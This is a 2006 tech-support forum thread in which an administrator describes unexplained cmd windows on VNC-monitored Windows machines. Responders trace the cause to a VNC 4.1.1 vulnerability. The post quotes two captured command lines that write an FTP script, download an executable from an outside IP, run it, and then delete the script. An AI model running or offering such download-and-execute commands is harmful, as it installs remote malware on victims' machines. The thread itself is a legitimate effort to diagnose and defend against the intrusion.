Solved

cmd opens, runs ftp command and closes

Posted on 2006-11-30
5
530 Views
Last Modified: 2008-01-09
hi all

I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing.   sometimes they open a cmd window with the following commands

cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit

ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.

i've already  avg-adaware-spybot-regedit-systedit'ED  those boxes and nothing strange came out,

i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.

i ve seen this in some other computers and im sure im not the only one.

any ideas ?

I hate xp, how can someone run something on a computer that does not have nothing to do with internet ?   the only thing that is internet related in that box is antivirus updating.  

I HATE XP ZILLION Vulnerabilities.


0
Comment
Question by:HTorres
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
5 Comments
 
LVL 4

Author Comment

by:HTorres
ID: 18051858
Thanks in advance all
0
 
LVL 70

Expert Comment

by:Merete
ID: 18052350
These days anything is possible I would be concerned with too, any staff clients trying to hack into the system?
Here is two great tools from systernals
process explorer may assist you
Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx

RegMon for Windows v7.04
http://www.microsoft.com/technet/sysinternals/utilities/regmon.mspx

All Systernal tools
http://www.microsoft.com/technet/sysinternals/default.mspx

Active Ports is another great little tool it will show which ports are active and you can queiry it and even stop them.
http://www.download.com/3000-2085-10062969.html

Hope they bring some light to this issue
Merete
0
 
LVL 11

Accepted Solution

by:
ch2 earned 250 total points
ID: 18052401
This is a vulnerability of the VNC.

This PAQ: http:Q_22047347.html
0
 
LVL 4

Author Comment

by:HTorres
ID: 18055261
Merete, great links
thank you!

--

Ch2, that was it!!!

Ive noticed that this thing only happened in vnc411, the other computers where we have vnc412 are without incidents.

One thing came to my mind.  my ISP is a moron and they have all ports closed (they even tried to close port 25) ... so i can connect from here to other computers via internet, but i cannot connect (from there) to our computers here
How can someone could enter here and exploit a vulnerability and I cannot connect ?

i will take a look at activeports

what port they are using?

0
 
LVL 70

Expert Comment

by:Merete
ID: 18058904
thanks glad you like them  
0

Featured Post

Free Tool: Site Down Detector

Helpful to verify reports of your own downtime, or to double check a downed website you are trying to access.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

cPanel is a Unix based web hosting control panel that provides a graphical interface and automation tools designed to simplify the process of hosting a web site. cPanel utilizes a 3 tier structure that provides functionality for administrators, rese…
Sometimes people don't understand why download speed shows differently for Windows than Linux.Specially, this article covers and shows the solution for throughput difference for Windows than a Linux machine. For this, I arranged a test scenario.I…
Two types of users will appreciate AOMEI Backupper Pro: 1 - Those with PCIe drives (and haven't found cloning software that works on them). 2 - Those who want a fast clone of their boot drive (no re-boots needed) and it can clone your drive wh…
In this video we outline the Physical Segments view of NetCrunch network monitor. By following this brief how-to video, you will be able to learn how NetCrunch visualizes your network, how granular is the information collected, as well as where to f…

630 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question